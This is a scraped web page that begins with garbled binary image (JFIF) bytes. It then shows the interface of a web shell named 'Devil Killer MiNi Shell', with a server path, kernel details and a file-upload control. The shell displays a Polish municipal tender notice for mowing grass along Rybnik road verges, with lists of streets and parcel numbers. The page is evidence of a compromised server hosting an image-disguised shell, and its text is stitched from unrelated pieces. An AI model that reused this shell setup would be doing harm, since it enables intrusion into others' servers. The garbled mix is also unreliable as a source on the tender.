JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190315/525893-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 525893-N-2019 z dnia 2019-03-15 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zarząd Zieleni Miejskiej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Koszenie trawy z poboczy dróg, rowów i skarp na terenie Miasta Rybnika</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zarząd Zieleni Miejskiej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27150551400000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Pod Lasem</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">64</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">44-210</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Rybnik</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">32 4248838</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia.publiczne@zielen.rybnik.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">32 4249326</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.zielen.rybnik.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.zielen.rybnik.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.zielen.rybnik.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">forma pisemna</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">(adres pocztowy): Zarząd Zieleni Miejskiej, ul. Pod Lasem 64, 44-210 Rybnik</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Koszenie trawy z poboczy dróg, rowów i skarp na terenie Miasta Rybnika</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.261.2.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu"> Przedmiotem zamówienia jest trzykrotne koszenie trawy z poboczy dróg, rowów, skarp na terenie Miasta Rybnika wraz z zebraniem (dotyczy również chodnika i jezdni) i wywozem skoszonej trawy. Trawę z chodnika i jezdni należy zebrać natychmiast po skoszeniu i wywieźć, natomiast trawę z pozostałego terenu należy zebrać i wywieźć do 48 godzin od skoszenia na danym odcinku robót. Podane niżej ilości powierzchni do skoszenia są orientacyjne i mogą odbiegać od faktycznych powierzchni terenu wynikających z map z uwagi na ukształtowanie i rodzaj terenu. Wykonawca zobowiązany będzie do wykonania usługi na całym terenie przedstawionym na załączniku mapowym.Przedmiot zamówienia realizowany będzie w trzech etapach:a) etap I (I koszenie) - rozpoczęcie w terminie wskazanym przez zamawiającego (czas przeznaczony na wykonanie 1 etapu - 14 dni kalendarzowych od rozpoczęcia prac);b) etap II (II koszenie) - rozpoczęcie w terminie wskazanym przez zamawiającego (czas przeznaczony na wykonanie 2 etapu - 14 dni kalendarzowych od rozpoczęcia prac);c) etap III (III koszenie) - rozpoczęcie w terminie wskazanym przez zamawiającego (czas przeznaczony na wykonanie 3 etapu - 14 dni kalendarzowych od rozpoczęcia prac).Do wykoszenia przeznaczone są tereny przy następujących ulicach:1. Ulica Raciborska obejmuje odcinek od ronda ,,Lievin" (skrzyżowanie ulic: Raciborska z Budowlanych) do końca granic miasta w kierunku Rydułtów.Orientacyjna powierzchnia terenu do koszenia - 26 440 m?.Koszenie nie obejmuje wysp rond.Na załączonych mapach ulicę Raciborską podzielono na odcinki, do których przyporządkowano numery działek, w obszarze których będzie wykonywane koszenie:Raciborska_12548/40, 1332/15, 1330/34, 1334/15, 1336/15, 2431/15, 1340/15, 1342/15, 2427/37, 2426/35, 1344/15, 2746/15, 2417/14, 2415/14, 2413/14, 2411/14, 2409/14;Raciborska_22548/40, 2403/14, 1786/14, 2521/14, 2563/38, 2519/14, 2515/11, 2555/41, 2557/41, 2551/41, 2513/7, 2508/7, 2550/41;Raciborska_32548/40, 2508/7, 2547/40, 2505/7, 2545/41, 2501/7, 2539/42, 2499/7, 2497/7, 2548/40, 2537/42, 2535/42, 2533/42, 2531/42, 2496/7, 2493/7, 2491/7, 2489/7, 2487/7, 19, 174/22;Raciborska_4174/22, 174/15, 174/25, 174/24, 1087/4, 1085/6, 512/10, 5, 174/13, 1080/8, 1082/6, 29, 174/12, 1078/9;Raciborska_5512/9, 1080/8, 29, 174/12, 1076/12, 1074/11, 1072/31, 1070/32, 27, 175/4, 26, 1068/33, 1066/33, 512/10;Raciborska_61813/48, 26, 1050/48, 1048/47, 1046/47, 512/10, 1812/46, 1058/45, 410/2, 381/17, 379/17, 383/18, 379/17, 377/17, 570/14;Raciborska_7410/2, 369/14, 393/20, 368/2, 366/15, 395/1, 328/21, 362/12, 397/21, 398/23;Raciborska_8397/21, 410/2, 398/23, 359/1, 357/1, 404/28, 355/1, 237/13, 235/20, 411/2, 233/2, 231/4, 229/3, 353/1;Raciborska_9353/1, 411/2.Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej:chodniki, latarnie, znaki drogowe.Koszenie obejmować ma następujące obszary:pobocza - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia	posesji, w miejscach niezabudowanych - do 2 metrów;pobocza za chodnikami - w miejscach, gdzie znajdują się zabudowania, koszenie do	ogrodzenia posesji, w miejscach nie zabudowanych - do 2 metrów za chodnik; pobocza za barierkami ochronnymi;rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za	rowem);skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na	skarpie);na odcinkach Raciborska_3, Raciborska_4, Raciborska_5, koszenie obejmuje również	tereny za ścieżką rowerową, za rowami do linii zadrzewienia (dwie strony), oraz	koszenie terenów wokół zbiorników przeciwpożarowych. 2. Ulica Zebrzydowicka obejmuje odcinek od ronda Zebrzydowickiego (skrzyżowanie ulic: Zebrzydowicka z Budowlanych) do skrzyżowania ulic: Zebrzydowicka z Wiatraczną. Orientacyjna powierzchnia terenu do koszenia - 12 600 m?.Na załączonych mapach ulicę Zebrzydowicką podzielono na odcinki, do których przyporządkowano numery działek, w obszarze których będzie wykonywane koszenie:Zebrzydowicka_11426/164, 2318/164, 2067/164, 466/139, 2048/78, 2049/98, 2055/142, 2068/140, 441/141;Zebrzydowicka_22068/140, 466/139, 2049/98, 2071/138, 2073/137, 2760/33, 2757/30;Zebrzydowicka_32760/33, 2756/32, 2755/32, 2754/32, 2752/32, 2751/32, 2750/32, 3060/32, 2747/32, 2745/69, 2744/69;Zebrzydowicka_41913/33, 1912/33, 2743/70, 2759/139, 2742/61, 2735/57, 750/139, 3441/136;Zebrzydowicka_52759/139, 3441/136, 2739/138.Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej:chodniki, latarnie, barierki ochronne, znaki drogowe.Koszenie obejmować ma następujące obszary:pobocza - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach niezabudowanych - do 2 metrów;pobocza za chodnikami - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach nie zabudowanych - do 2 metrów za chodnik;pobocza za barierkami ochronnymi;rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za	rowem);skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie).3. Ulica Rudzka obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Jana Kotucza do końca granic miasta Rybnika w kierunku Rud. Orientacyjna powierzchnia terenu do koszenia - 45 900 m?.Na załączonych mapach ulicę Rudzką podzielono na odcinki, do których przyporządkowano numery działek, w obszarze których będzie wykonywane koszenie poboczy:Rudzka_1567/261, 4581/118;Rudzka_24581/118, 4582/118, 567/261;Rudzka_32693/92, 580/98, 1750/95, 2687/95, 2691/93, 954/118, 4583/118, 4582/118, 545/92, 4392/118, 2036/98; Rudzka_42677/106, 4583/118, 2679/106, 2681/106, 2726/106;Rudzka_52614/116, 597/118, 2671/120, 2673/120, 3431/119, 2677/106, 4583/118, 3433/116;Rudzka_63041/182, 597/118, 2653/126, 2655/125, 2657/124, 2667/123, 4583/118, 2663/123, 2665/123, 2661/124, 2659/124;Rudzka_7297/118, 2639/181, 2643/130, 2645/130, 2649/128, 2651/127, 2653/126, 4583/118;Rudzka_82085/209, 4327/185, 1040/351, 4656/351, 2162/240, 4658/344, 2090/184, 2164/344, 597/118, 4325/184, 4323/184, 2631/177, 2633/181, 2635/181, 2637/181, 4583/118, 2089/184, 2092/184, 2627/184, 2628/184, 4322/184, 4324/184, 4326/185;Rudzka_93714/332, 4774/351, 2164/344, 2781/327, 2782/327, 4773/351;Rudzka_102714/325, 2712/325, 2775/325, 2774/325, 2709/326, 2710/326, 2713/325, 2707/325, 2711/325, 2776/327, 2770/325, 2773/351;Rudzka_114773/351;Rudzka_124773/351, 2747/256, 2745/273, 2743/271, 3908/271, 4730/256; Rudzka_131061/122, 1525/94, 450/130, 4773/351; Rudzka_14521/101, 1068/95, 1526/94, 1525/94, 1629/78, 1517/94, 1515/94, 467/94, 466/94, 1520/94;Rudzka_1593/13, 77/13, 78/13, 81/15, 84/15, 87/15, 91/15, 86/15, 67/15;Rudzka_1620/15, 248/26, 282/26, 95/28, 93/13, 94/25;Rudzka_17370/37, 1331/33, 1333/32, 1335/32, 1337/32, 1339/31, 1341/31, 1343/30, 1351/28, 1353/27, 1355/27, 1364/26, 1366/26, 1368/26, 1370/26, 1372/25, 1378/60, 1380/60, 1382/60, 1383/60; Rudzka_18778/23, 1357/133, 1322/34, 1359/110, 1324/34, 1326/34, 1290/109, 1356/133, 1257/6, 370/37, 1291/109, 1293/107, 1295/104, 1297/103, 1299/103, 1303/103, 1313/83, 1315/83, 1321/35;Rudzka_191510/16, 1262/16, 1614/16, 1356/133, 1406/16, 1256/6, 1257/6, 370/37, 1612/17, 884/94, 894/69, 998/60, 892/71, 1170/75, 1408/7;Rudzka_20887/76, 1166/78, 1057/75, 1058/75, 884/94, 886/76, 885/94, 1225/76, 892/71, 848/94;Rudzka_21703/68, 704/68, 705/79, 706/79, 1144/113, 983/73, 823/113, 832/113, 537/187, 538/187, 820/187, 1195/94, 696/73, 700/68, 702/68, 825/113, 826/113, 827/113, 828/113, 830/94, 984/73, 753/79, 1196/94, 698/68, 784/151, 786/151, 780/123, 796/151, 798/151, 792/151, 794/151, 790/151, 788/151, 802/165, 804/167, 848/94, 821/187;Rudzka_22753/79;Rudzka_2360/8, 753/79;Rudzka_2422/1.Rudzka_25753/79, 820/187, 698/68, 707/78, 711/78, 696/73, 713/78, 715/78;Rudzka_26978/78, 721/78, 723/78, 725/78, 727/78, 968/78, 966/78, 733/78, 735/78, 737/78;Rudzka_27735/78, 737/78, 739/78, 696/73, 741/78;Rudzka_28743/78, 746/78, 747/78, 696/73, 753/79;Rudzka_2960/8, 753/79, 64/6.Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej:latarnie, znaki, barierki ochronne, chodniki.Koszenie obejmować ma następujące obszary:pobocza - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach niezabudowanych - do 2 metrów;pobocza za chodnikami - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach nie zabudowanych - do 2 metrów za chodnik;pobocza za barierkami ochronnymi;rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za rowem);skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie).4. Ulica Mikołowska obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Stawową do końca granic miasta w kierunku Przegędzy.Orientacyjna powierzchnia terenów do koszenia - 19 000 m?.Na załączonych mapach ulicę Mikołowską podzielono na odcinki, do których przyporządkowano numery działek, w obszarze których będzie wykonywane koszenie poboczy:Mikołowska_1468/287, 2056/304, 102/18; Mikołowska_2468/287, 126/22;Mikołowska_3126/22, 402/38;Mikołowska_4402/38;Mikołowska_5402/38.Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej:latarnie, znaki, barierki ochronne.Koszenie obejmować ma następujące obszary:pobocza - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach niezabudowanych - do 2 metrów;pobocza za chodnikami - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach nie zabudowanych - do 2 metrów za chodnik;pobocza za barierkami ochronnymi;rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za rowem);skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie).5. Ulica Boguszowicka obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Żorską do skrzyżowania z ulicą Gotartowicką.Orientacyjna powierzchnia terenów do koszenia - 12 000 m?.Na załączonych mapach ulicę Boguszowicką podzielono na odcinki, do których przyporządkowano numery działek, w obszarze których będzie wykonywane koszenie poboczy:Boguszowicka_1367/1, 371/3, 411/126, 373/10, 375/11, 425/51;Boguszowicka_2335/47, 417/135, 418/136, 413/133, 377/52, 415/133;Boguszowicka_3344/79, 343/67, 417/135, 418/136, 383/81, 389/101, 391/101, 392/100, 850/51, 381/67, 425/140, 421/140, 387/101, 395/103, 423/140, 427/141, 428/142, 425/51, 427/51, 428/51;Boguszowicka_4720/6, 678/4, 722/53, 403/113, 405/113, 407/113, 401/113, 1388/116;Boguszowicka_5722/53, 407/113, 1388/116, 405/113, 407/113, 468/116, 469/116;Boguszowicka_6722/53, 469/116, 1388/116, 482/116, 483/116, 411/114;Boguszowicka_7722/53, 484/116, 1388/116, 419/113;Boguszowicka_8728/150, 417/113, 421/113, 724/150, 722/53, 415/113, 730/150, 726/150, 1386/113, 1388/116, 1689/151, 419/113;Boguszowicka_91688/151, 